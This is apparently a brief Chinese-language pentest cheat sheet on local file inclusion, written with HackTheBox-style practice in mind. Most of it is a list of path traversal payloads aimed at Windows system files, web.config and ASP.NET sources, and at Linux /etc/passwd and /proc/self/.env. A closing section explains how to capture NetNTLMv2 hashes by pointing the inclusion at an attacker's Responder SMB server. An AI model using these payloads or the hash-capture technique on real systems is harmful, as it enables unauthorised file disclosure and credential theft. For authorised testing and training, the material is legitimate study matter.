LFI
1. 验证是否存在
推荐字典
GitHub - carlospolop/Auto_Wordlists
https://github.com/carlospolop/Auto_Wordlists/tree/main/custom_wordlists
1.1. windows
有时候需要使用反斜杠
C:/Windows/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/Windows/system.ini
../Windows/System32/drivers/etc/hosts
../Windows/win.ini
../Windows/system.ini
/inetpub/wwwroot/web.config
../../web.config
ASP.NET
../../Global.asax
../../App_global.asax
../../App_Start/RouteConfig.cs
../../Views/Shared/_Layout.cshtml
../../Views/Shared/_LoginPartial.cshtml
../../Views/Home/Index.cshtml
../../Views/Error/Index.cs
1.2. linux
../etc/passwd
../../../../../../../../proc/self/cwd/
../../../../../../../../proc/self/.env
2. 其他利用姿势
2.1. NetNTLMv2
Tip
在大多数情况下,Windows 系统有个便利特性:当尝试读取共享目录中的文件时,系统会自动尝试从该共享位置打开文件。这时候可以尝试使用Responder 工具并让它读取我主机上的文件:
开启 Responder 监听,它会自动在我们的主机445端口开启一个SMB服务器,然后利用LFI远程包含我的SMB服务器上的文件
参考:HTB LustrousTwo > 1.5.1. NetNTLMv2